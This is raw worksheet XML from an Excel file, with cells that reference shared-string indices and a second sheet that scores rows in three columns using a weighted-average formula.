      <c r="A539" s="13" t="s">
        <v>2449</v>
      </c>
      <c r="B539" s="13" t="s">
        <v>2450</v>
      </c>
      <c r="C539" s="13" t="s">
        <v>2442</v>
      </c>
      <c r="D539" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E539" s="13" t="s">
        <v>2451</v>
      </c>
      <c r="F539" s="13" t="s">
        <v>2452</v>
      </c>
      <c r="G539" s="13" t="s">
        <v>625</v>
      </c>
      <c r="H539" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="540" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A540" s="13" t="s">
        <v>2453</v>
      </c>
      <c r="B540" s="13" t="s">
        <v>2454</v>
      </c>
      <c r="C540" s="13" t="s">
        <v>2455</v>
      </c>
      <c r="D540" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E540" s="13" t="s">
        <v>2456</v>
      </c>
      <c r="F540" s="13" t="s">
        <v>2457</v>
      </c>
      <c r="G540" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H540" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="541" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A541" s="13" t="s">
        <v>2458</v>
      </c>
      <c r="B541" s="13" t="s">
        <v>2459</v>
      </c>
      <c r="C541" s="13" t="s">
        <v>2460</v>
      </c>
      <c r="D541" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E541" s="13" t="s">
        <v>2461</v>
      </c>
      <c r="F541" s="13" t="s">
        <v>2462</v>
      </c>
      <c r="G541" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H541" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="542" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A542" s="13" t="s">
        <v>2463</v>
      </c>
      <c r="B542" s="13" t="s">
        <v>2464</v>
      </c>
      <c r="C542" s="13" t="s">
        <v>2465</v>
      </c>
      <c r="D542" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E542" s="13" t="s">
        <v>2882</v>
      </c>
      <c r="F542" s="13" t="s">
        <v>2467</v>
      </c>
      <c r="G542" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H542" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="543" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A543" s="13" t="s">
        <v>2468</v>
      </c>
      <c r="B543" s="13" t="s">
        <v>2469</v>
      </c>
      <c r="C543" s="13" t="s">
        <v>2460</v>
      </c>
      <c r="D543" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E543" s="13" t="s">
        <v>2470</v>
      </c>
      <c r="F543" s="13" t="s">
        <v>2471</v>
      </c>
      <c r="G543" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H543" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="544" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A544" s="13" t="s">
        <v>2472</v>
      </c>
      <c r="B544" s="13" t="s">
        <v>2473</v>
      </c>
      <c r="C544" s="13" t="s">
        <v>2474</v>
      </c>
      <c r="D544" s="13" t="s">
        <v>1338</v>
      </c>
      <c r="E544" s="13" t="s">
        <v>2475</v>
      </c>
      <c r="F544" s="13" t="s">
        <v>2476</v>
      </c>
      <c r="G544" s="13" t="s">
        <v>827</v>
      </c>
      <c r="H544" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="545" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A545" s="13" t="s">
        <v>2477</v>
      </c>
      <c r="B545" s="13" t="s">
        <v>2478</v>
      </c>
      <c r="C545" s="13" t="s">
        <v>1062</v>
      </c>
      <c r="D545" s="13" t="s">
        <v>792</v>
      </c>
      <c r="E545" s="13" t="s">
        <v>2479</v>
      </c>
      <c r="F545" s="13" t="s">
        <v>2480</v>
      </c>
      <c r="G545" s="13" t="s">
        <v>827</v>
      </c>
      <c r="H545" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="546" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A546" s="13" t="s">
        <v>2481</v>
      </c>
      <c r="B546" s="13" t="s">
        <v>2482</v>
      </c>
      <c r="C546" s="13" t="s">
        <v>631</v>
      </c>
      <c r="D546" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E546" s="13" t="s">
        <v>2483</v>
      </c>
      <c r="F546" s="13" t="s">
        <v>2484</v>
      </c>
      <c r="G546" s="13" t="s">
        <v>827</v>
      </c>
      <c r="H546" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="547" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A547" s="13" t="s">
        <v>2485</v>
      </c>
      <c r="B547" s="13" t="s">
        <v>2486</v>
      </c>
      <c r="C547" s="13" t="s">
        <v>1260</v>
      </c>
      <c r="D547" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E547" s="13" t="s">
        <v>2487</v>
      </c>
      <c r="F547" s="13" t="s">
        <v>2488</v>
      </c>
      <c r="G547" s="13" t="s">
        <v>661</v>
      </c>
      <c r="H547" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="548" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A548" s="13" t="s">
        <v>2489</v>
      </c>
      <c r="B548" s="13" t="s">
        <v>2490</v>
      </c>
      <c r="C548" s="13" t="s">
        <v>2491</v>
      </c>
      <c r="D548" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E548" s="13" t="s">
        <v>2492</v>
      </c>
      <c r="F548" s="13" t="s">
        <v>2493</v>
      </c>
      <c r="G548" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H548" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="549" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A549" s="13" t="s">
        <v>2494</v>
      </c>
      <c r="B549" s="13" t="s">
        <v>2495</v>
      </c>
      <c r="C549" s="13" t="s">
        <v>1091</v>
      </c>
      <c r="D549" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E549" s="13" t="s">
        <v>2496</v>
      </c>
      <c r="F549" s="13" t="s">
        <v>2497</v>
      </c>
      <c r="G549" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H549" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="550" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A550" s="13" t="s">
        <v>2498</v>
      </c>
      <c r="B550" s="13" t="s">
        <v>2499</v>
      </c>
      <c r="C550" s="13" t="s">
        <v>2500</v>
      </c>
      <c r="D550" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E550" s="13" t="s">
        <v>2501</v>
      </c>
      <c r="F550" s="13" t="s">
        <v>2502</v>
      </c>
      <c r="G550" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H550" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="551" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A551" s="13" t="s">
        <v>2503</v>
      </c>
      <c r="B551" s="13" t="s">
        <v>2504</v>
      </c>
      <c r="C551" s="13" t="s">
        <v>2500</v>
      </c>
      <c r="D551" s="13" t="s">
        <v>549</v>
      </c>
      <c r="E551" s="13" t="s">
        <v>2505</v>
      </c>
      <c r="F551" s="13" t="s">
        <v>2506</v>
      </c>
      <c r="G551" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H551" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="552" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A552" s="13" t="s">
        <v>2507</v>
      </c>
      <c r="B552" s="13" t="s">
        <v>2508</v>
      </c>
      <c r="C552" s="13" t="s">
        <v>2509</v>
      </c>
      <c r="D552" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E552" s="13" t="s">
        <v>2501</v>
      </c>
      <c r="F552" s="13" t="s">
        <v>2510</v>
      </c>
      <c r="G552" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H552" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="553" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A553" s="13" t="s">
        <v>2511</v>
      </c>
      <c r="B553" s="13" t="s">
        <v>2512</v>
      </c>
      <c r="C553" s="13" t="s">
        <v>2513</v>
      </c>
      <c r="D553" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E553" s="13" t="s">
        <v>2514</v>
      </c>
      <c r="F553" s="13" t="s">
        <v>2515</v>
      </c>
      <c r="G553" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H553" s="13" t="s">
        <v>905</v>
      </c>
    </row>
    <row r="554" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A554" s="13" t="s">
        <v>2517</v>
      </c>
      <c r="B554" s="13" t="s">
        <v>2518</v>
      </c>
      <c r="C554" s="13" t="s">
        <v>2519</v>
      </c>
      <c r="D554" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E554" s="13" t="s">
        <v>2520</v>
      </c>
      <c r="F554" s="13" t="s">
        <v>2521</v>
      </c>
      <c r="G554" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H554" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="555" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A555" s="13" t="s">
        <v>2522</v>
      </c>
      <c r="B555" s="13" t="s">
        <v>2523</v>
      </c>
      <c r="C555" s="13" t="s">
        <v>2524</v>
      </c>
      <c r="D555" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E555" s="13" t="s">
        <v>2525</v>
      </c>
      <c r="F555" s="13" t="s">
        <v>2526</v>
      </c>
      <c r="G555" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H555" s="13" t="s">
        <v>905</v>
      </c>
    </row>
    <row r="556" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A556" s="13" t="s">
        <v>2527</v>
      </c>
      <c r="B556" s="13" t="s">
        <v>2528</v>
      </c>
      <c r="C556" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D556" s="13" t="s">
        <v>792</v>
      </c>
      <c r="E556" s="13" t="s">
        <v>2529</v>
      </c>
      <c r="F556" s="13" t="s">
        <v>2530</v>
      </c>
      <c r="G556" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H556" s="13" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="557" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A557" s="13" t="s">
        <v>2531</v>
      </c>
      <c r="B557" s="13" t="s">
        <v>2532</v>
      </c>
      <c r="C557" s="13" t="s">
        <v>2126</v>
      </c>
      <c r="D557" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E557" s="13" t="s">
        <v>2533</v>
      </c>
      <c r="F557" s="13" t="s">
        <v>2883</v>
      </c>
      <c r="G557" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H557" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="558" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A558" s="13" t="s">
        <v>2535</v>
      </c>
      <c r="B558" s="13" t="s">
        <v>2536</v>
      </c>
      <c r="C558" s="13" t="s">
        <v>2537</v>
      </c>
      <c r="D558" s="13" t="s">
        <v>590</v>
      </c>
      <c r="E558" s="13" t="s">
        <v>2538</v>
      </c>
      <c r="F558" s="13" t="s">
        <v>2539</v>
      </c>
      <c r="G558" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H558" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="559" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A559" s="13" t="s">
        <v>2540</v>
      </c>
      <c r="B559" s="13" t="s">
        <v>2541</v>
      </c>
      <c r="C559" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D559" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E559" s="13" t="s">
        <v>2542</v>
      </c>
      <c r="F559" s="13" t="s">
        <v>2543</v>
      </c>
      <c r="G559" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H559" s="13" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="560" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A560" s="13" t="s">
        <v>2544</v>
      </c>
      <c r="B560" s="13" t="s">
        <v>2545</v>
      </c>
      <c r="C560" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D560" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E560" s="13" t="s">
        <v>2546</v>
      </c>
      <c r="F560" s="13" t="s">
        <v>2547</v>
      </c>
      <c r="G560" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H560" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="561" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A561" s="13" t="s">
        <v>2548</v>
      </c>
      <c r="B561" s="13" t="s">
        <v>2549</v>
      </c>
      <c r="C561" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D561" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E561" s="13" t="s">
        <v>2542</v>
      </c>
      <c r="F561" s="13" t="s">
        <v>2550</v>
      </c>
      <c r="G561" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H561" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="562" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A562" s="13" t="s">
        <v>2551</v>
      </c>
      <c r="B562" s="13" t="s">
        <v>2552</v>
      </c>
      <c r="C562" s="13" t="s">
        <v>2553</v>
      </c>
      <c r="D562" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E562" s="13" t="s">
        <v>2554</v>
      </c>
      <c r="F562" s="13" t="s">
        <v>2555</v>
      </c>
      <c r="G562" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H562" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="563" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A563" s="13" t="s">
        <v>2556</v>
      </c>
      <c r="B563" s="13" t="s">
        <v>2557</v>
      </c>
      <c r="C563" s="13" t="s">
        <v>2558</v>
      </c>
      <c r="D563" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E563" s="13" t="s">
        <v>2559</v>
      </c>
      <c r="F563" s="13" t="s">
        <v>2560</v>
      </c>
      <c r="G563" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H563" s="13" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="564" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A564" s="13" t="s">
        <v>2561</v>
      </c>
      <c r="B564" s="13" t="s">
        <v>2562</v>
      </c>
      <c r="C564" s="13" t="s">
        <v>2563</v>
      </c>
      <c r="D564" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E564" s="13" t="s">
        <v>2564</v>
      </c>
      <c r="F564" s="13" t="s">
        <v>2884</v>
      </c>
      <c r="G564" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H564" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="565" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A565" s="13" t="s">
        <v>2566</v>
      </c>
      <c r="B565" s="13" t="s">
        <v>2567</v>
      </c>
      <c r="C565" s="13" t="s">
        <v>2340</v>
      </c>
      <c r="D565" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E565" s="13" t="s">
        <v>2568</v>
      </c>
      <c r="F565" s="13" t="s">
        <v>2569</v>
      </c>
      <c r="G565" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H565" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="566" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A566" s="13" t="s">
        <v>2570</v>
      </c>
      <c r="B566" s="13" t="s">
        <v>2571</v>
      </c>
      <c r="C566" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="D566" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E566" s="13" t="s">
        <v>2573</v>
      </c>
      <c r="F566" s="13" t="s">
        <v>2574</v>
      </c>
      <c r="G566" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H566" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="567" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A567" s="13" t="s">
        <v>2575</v>
      </c>
      <c r="B567" s="13" t="s">
        <v>2576</v>
      </c>
      <c r="C567" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="D567" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E567" s="13" t="s">
        <v>2577</v>
      </c>
      <c r="F567" s="13" t="s">
        <v>2578</v>
      </c>
      <c r="G567" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H567" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="568" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A568" s="13" t="s">
        <v>2579</v>
      </c>
      <c r="B568" s="13" t="s">
        <v>2580</v>
      </c>
      <c r="C568" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="D568" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E568" s="13" t="s">
        <v>2581</v>
      </c>
      <c r="F568" s="13" t="s">
        <v>2582</v>
      </c>
      <c r="G568" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H568" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="569" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A569" s="13" t="s">
        <v>2583</v>
      </c>
      <c r="B569" s="13" t="s">
        <v>2584</v>
      </c>
      <c r="C569" s="13" t="s">
        <v>2340</v>
      </c>
      <c r="D569" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E569" s="13" t="s">
        <v>2585</v>
      </c>
      <c r="F569" s="13" t="s">
        <v>2586</v>
      </c>
      <c r="G569" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H569" s="13" t="s">
        <v>539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431"/>
  <sheetViews>
    <sheetView zoomScale="130" zoomScaleNormal="130" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B13" sqref="B13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="34.83203125" customWidth="1"/>
    <col min="2" max="2" width="105.33203125" customWidth="1"/>
    <col min="3" max="5" width="20.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.5" style="1" customWidth="1"/>
    <col min="7" max="26" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="29" t="s">
        <v>2907</v>
      </c>
      <c r="B1" s="29" t="s">
        <v>2908</v>
      </c>
      <c r="C1" s="30" t="s">
        <v>2896</v>
      </c>
      <c r="D1" s="30" t="s">
        <v>2899</v>
      </c>
      <c r="E1" s="30" t="s">
        <v>2901</v>
      </c>
      <c r="F1" s="31" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" s="13" t="s">
        <v>2909</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C2" s="14">
        <v>0</v>
      </c>
      <c r="D2" s="14">
        <v>0</v>
      </c>
      <c r="E2" s="14">
        <v>0</v>
      </c>
      <c r="F2" s="32">
        <f t="shared" ref="F2:F33" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B3" s="13" t="s">
        <v>2911</v>
      </c>
      <c r="C3" s="14">
        <v>0</v>
      </c>
      <c r="D3" s="14">
        <v>0</v>
      </c>
      <c r="E3" s="14">
        <v>0</v>
      </c>
      <c r="F3" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>2912</v>
      </c>
      <c r="C4" s="14">
        <v>0</v>
      </c>
      <c r="D4" s="14">
        <v>0</v>
      </c>
      <c r="E4" s="14">
        <v>0</v>
      </c>
      <c r="F4" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>2913</v>
      </c>
      <c r="C5" s="14">
        <v>0</v>
      </c>
      <c r="D5" s="14">
        <v>0</v>
      </c>
      <c r="E5" s="14">
        <v>0</v>
      </c>
      <c r="F5" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>2914</v>
      </c>
      <c r="C6" s="14">
        <v>5</v>
      </c>
      <c r="D6" s="14">
        <v>5</v>
      </c>
      <c r="E6" s="14">
        <v>5</v>
      </c>
      <c r="F6" s="32">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A7" s="13" t="s">
        <v>603</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C7" s="14">
        <v>0</v>
      </c>
      <c r="D7" s="14">
        <v>0</v>
      </c>
      <c r="E7" s="14">
        <v>0</v>
      </c>
      <c r="F7" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A8" s="13" t="s">
        <v>2915</v>
      </c>
      <c r="B8" s="13"/>
      <c r="C8" s="14">
        <v>0</v>
      </c>
      <c r="D8" s="14">
        <v>0</v>
      </c>
      <c r="E8" s="14">
        <v>0</v>
      </c>
      <c r="F8" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A9" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>2916</v>
      </c>
      <c r="C9" s="14">
        <v>5</v>
      </c>
      <c r="D9" s="14">
        <v>5</v>
      </c>
      <c r="E9" s="14">
        <v>5</v>
      </c>
      <c r="F9" s="32">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A10" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>2917</v>
      </c>
      <c r="C10" s="14">
        <v>5</v>
      </c>
      <c r="D10" s="14">
        <v>5</v>
      </c>
      <c r="E10" s="14">
        <v>5</v>
      </c>
      <c r="F10" s="32">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A11" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B11" s="13" t="s">
        <v>2918</v>
      </c>
      <c r="C11" s="14">
        <v>3</v>
      </c>
      <c r="D11" s="14">
        <v>1</v>
      </c>
      <c r="E11" s="14">
        <v>1</v>
      </c>
      <c r="F11" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A12" s="13" t="s">
        <v>2919</v>
      </c>
      <c r="B12" s="13"/>
      <c r="C12" s="14">
        <v>0</v>
      </c>
      <c r="D12" s="14">
        <v>0</v>
      </c>
      <c r="E12" s="14">
        <v>0</v>
      </c>
      <c r="F12" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A13" s="13" t="s">
        <v>2920</v>
      </c>
      <c r="B13" s="13"/>
      <c r="C13" s="14">
        <v>0</v>
      </c>
      <c r="D13" s="14">
        <v>0</v>
      </c>
      <c r="E13" s="14">
        <v>0</v>
      </c>
      <c r="F13" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A14" s="13" t="s">
        <v>2921</v>
      </c>
      <c r="B14" s="13"/>
      <c r="C14" s="14">
        <v>0</v>
      </c>
      <c r="D14" s="14">
        <v>0</v>
      </c>
      <c r="E14" s="14">
        <v>0</v>
      </c>
      <c r="F14" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A15" s="13" t="s">
        <v>2922</v>
      </c>
      <c r="B15" s="13"/>
      <c r="C15" s="14">
        <v>0</v>
      </c>
      <c r="D15" s="14">
        <v>0</v>
      </c>
      <c r="E15" s="14">
        <v>0</v>
      </c>
      <c r="F15" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A16" s="13" t="s">
        <v>713</v>
      </c>
      <c r="B16" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C16" s="14">
        <v>0</v>
      </c>
      <c r="D16" s="14">
        <v>0</v>
      </c>
      <c r="E16" s="14">
        <v>0</v>
      </c>
      <c r="F16" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17" s="13" t="s">
        <v>2923</v>
      </c>
      <c r="B17" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C17" s="14">
        <v>0</v>
      </c>
      <c r="D17" s="14">
        <v>0</v>
      </c>
      <c r="E17" s="14">
        <v>0</v>
      </c>
      <c r="F17" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18" s="13" t="s">
        <v>1474</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C18" s="14">
        <v>0</v>
      </c>
      <c r="D18" s="14">
        <v>0</v>
      </c>
      <c r="E18" s="14">
        <v>0</v>
      </c>
      <c r="F18" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19" s="13" t="s">
        <v>2924</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C19" s="14">
        <v>0</v>
      </c>
      <c r="D19" s="14">
        <v>0</v>
      </c>
      <c r="E19" s="14">
        <v>0</v>
      </c>
      <c r="F19" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20" s="13" t="s">
        <v>2925</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>2926</v>
      </c>
      <c r="C20" s="14">
        <v>2.5</v>
      </c>
      <c r="D20" s="14">
        <v>1</v>
      </c>
      <c r="E20" s="14">
        <v>1</v>
      </c>
      <c r="F20" s="32">
        <f t="shared" si="0"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21" s="13" t="s">
        <v>2927</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>2928</v>
      </c>
      <c r="C21" s="14">
        <v>0</v>
      </c>
      <c r="D21" s="14">
        <v>0</v>
      </c>
      <c r="E21" s="14">
        <v>0</v>
      </c>
      <c r="F21" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22" s="13" t="s">
        <v>2927</v>
      </c>
      <c r="B22" s="13" t="s">
        <v>2929</v>
      </c>
      <c r="C22" s="14">
        <v>0</v>
      </c>
      <c r="D22" s="14">
        <v>0</v>
      </c>
      <c r="E22" s="14">
        <v>0</v>
      </c>
      <c r="F22" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23" s="13" t="s">
        <v>2930</v>
      </c>
      <c r="B23" s="13" t="s">
        <v>2931</v>
      </c>
      <c r="C23" s="14">
        <v>0</v>
      </c>
      <c r="D23" s="14">
        <v>0</v>
      </c>
      <c r="E23" s="14">
        <v>0</v>
      </c>
      <c r="F23" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24" s="13" t="s">
        <v>2932</v>
      </c>
      <c r="B24" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C24" s="14">
        <v>0</v>
      </c>
      <c r="D24" s="14">
        <v>0</v>
      </c>
      <c r="E24" s="14">
        <v>0</v>
      </c>
      <c r="F24" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25" s="13" t="s">
        <v>2933</v>
      </c>
      <c r="B25" s="13" t="s">
        <v>2934</v>
      </c>
      <c r="C25" s="14">
        <v>3</v>
      </c>
      <c r="D25" s="14">
        <v>4</v>
      </c>
      <c r="E25" s="14">
        <v>5</v>
      </c>
      <c r="F25" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B26" s="13" t="s">
        <v>2936</v>
      </c>
      <c r="C26" s="14">
        <v>4</v>
      </c>
      <c r="D26" s="14">
        <v>5</v>
      </c>
      <c r="E26" s="14">
        <v>5</v>
      </c>
      <c r="F26" s="32">
        <f t="shared" si="0"/>
